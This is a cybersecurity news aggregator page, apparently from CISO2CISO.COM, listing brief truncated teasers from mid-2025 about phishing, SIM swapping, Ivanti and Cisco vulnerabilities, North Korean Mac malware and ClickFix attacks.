 1 - Cyber Security News Post

Source: www.mcafee.com – Author: Jasdev Dhaliwal. How do you recognize phishing emails and texts? Even as many of the scammers behind them have sophisticated their attacks, you can still pick out telltale signs. Common to them all, every phishing is a cybercrime that aims to steal your sensitive info. Personal   show more ...

info. Financial info. Other attacks […] La entrada How to Recognize a Phishing Email – Source:www.mcafee.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: Jasdev Dhaliwal. You consider yourself a responsible person when it comes to taking care of your physical possessions. You’ve never left your wallet in a taxi or lost an expensive ring down the drain. You never let your smartphone out of your sight, yet one day you notice   show more ...

it’s acting oddly.   Did you know that your device […] La entrada How to Protect Your Smartphone from SIM Swapping – Source:www.mcafee.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . If you’re evaluating AI-powered SOC platforms, you’ve likely seen bold claims: faster triage, smarter remediation, and less noise. But under the hood, not all AI is created equal. Many solutions rely on pre-trained AI models that are hardwired for a handful of specific   show more ...

use cases. While that might work for […] La entrada The Hidden Weaknesses in AI SOC Tools that No One Talks About – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Chinese

Source: thehackernews.com – Author: . The French cybersecurity agency on Tuesday revealed that a number of entities spanning governmental, telecommunications, media, finance, and transport sectors in the country were impacted by a malicious campaign undertaken by a Chinese hacking group by weaponizing several   show more ...

zero-day vulnerabilities in Ivanti Cloud Services Appliance (CSA) devices. The campaign, detected […] La entrada Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Critical

Source: thehackernews.com – Author: . Cisco has released security updates to address a maximum-severity security flaw in Unified Communications Manager (Unified CM) and Unified Communications Manager Session Management Edition (Unified CM SME) that could permit an attacker to login to a susceptible device as   show more ...

the root user, allowing them to gain elevated privileges. The vulnerability, […] La entrada Critical Cisco Vulnerability in Unified CM Grants Root Access via Static Credentials – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Compliance

Source: www.csoonline.com – Author: If third-party providers violate regulations, they expose their clients to a compliance risk. Third-party risk management (TPRM) is intended to help against this. Whether your organization is aware or not, it does relly on third-party services providers that help to make   show more ...

business processes more effective and efficient. However, working with third […] La entrada Third-party risk management: How to avoid compliance disaster – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com – Author: Die Bundesregierung macht Russland für Desinformation im Netz verantwortlich. Skorzewiak – shutterstock.com Die Bundesregierung macht Russland für Desinformation verantwortlich, die über eine von der Türkei aus agierende Medienplattform verbreitet wird. Moskau nutze die   show more ...

dort registrierte Plattform “Red.” gezielt zur Informationsmanipulation, sagte ein Sprecher des Auswärtigen Amts in Berlin. Ziel sei es, […] La entrada Russland nutzt Medienplattform für Desinformation – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cloud Security

Source: www.csoonline.com – Author: From inadequate visibility to access management complexity, multicloud environments take baseline cloud security issues to another level. A multicloud environment is now standard for midsize and large organizations, with tech leaders opting to use multiple cloud providers for   show more ...

the improved flexibility, resiliency, and additional advantages that operating in multiple clouds brings. […] La entrada 5 multicloud security challenges — and how to address them – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 cryptocurrency

Source: www.csoonline.com – Author: News Jul 2, 20254 mins CryptocurrencyMacOS SecurityMalware Researchers warn that recent attack campaigns against Web3 and crypto startups by a North Korean APT group have leveraged a new family of malware written in niche programming language Nim. North Korean threat actors   show more ...

are targeting companies from the Web3 and crypto industries with […] La entrada North Korean crypto thieves deploy custom Mac backdoor – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com – Author: News Jul 2, 20254 mins CyberattacksSocial Engineering Less understood than phishing, the social engineering technique that tricks users into pasting malicious commands into tools like PowerShell or the Windows Run prompt is running riot. Incidents of ClickFix — the social   show more ...

engineering attack technique that tricks users into executing malicious code — […] La entrada Sixfold surge of ClickFix attacks threatens corporate defenses – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 CSOonline

Source: www.csoonline.com – Author: Lesen Sie, welche Probleme sich aktuell durch die Abhängigkeit von CVE ergeben und welche Optionen es gibt. Sollte das CVE-Programm eingestellt werden, wäre die Bewertung und Behebung von Sicherheitslücken schwieriger. Dave Hoeek – shutterstock.com Der jüngste kurze   show more ...

Panikausbruch wegen der möglichen Einstellung des Common Vulnerabilities and Exposures (CVE)-Programms hat die starke […] La entrada Auf der Suche nach Alternativen zum CVE-Programm – Source: www.csoonline.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.schneier.com – Author: Bruce Schneier Once you build a surveillance system, you can’t control who will use it: A hacker working for the Sinaloa drug cartel was able to obtain an FBI official’s phone records and use Mexico City’s surveillance cameras to help track and kill the agency’s   show more ...

informants in 2018, according to a […] La entrada Surveillance Used by a Drug Cartel – Source: www.schneier.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: Jasdev Dhaliwal. As Amazon Prime Day approaches (July 8-11, 2025), millions of shoppers are gearing up for what promises to be one of the biggest online shopping events of the year. But while you’re hunting for deals, cybercriminals may be hunting for you. A recent devastating   show more ...

case from Montana serves as […] La entrada How to Shop Safely During Amazon Prime Day – Source:www.mcafee.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 'Cyber

Source: sec.cloudapps.cisco.com – Author: . Cisco Duo Self-Service Portal Command Injection Vulnerability Medium CVE-2025-20258 CWE-77 Download CSAF Email Summary A vulnerability in the self-service portal of Cisco Duo could allow an unauthenticated, remote attacker to inject arbitrary commands into emails that   show more ...

are sent by the service. This vulnerability is due to insufficient input validation. An […] La entrada Cisco Duo Self-Service Portal Command Injection Vulnerability – Source:sec.cloudapps.cisco.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

2025-07
Aggregator history
Thursday, July 03
TUE
WED
THU
FRI
SAT
SUN
MON
JulyAugustSeptember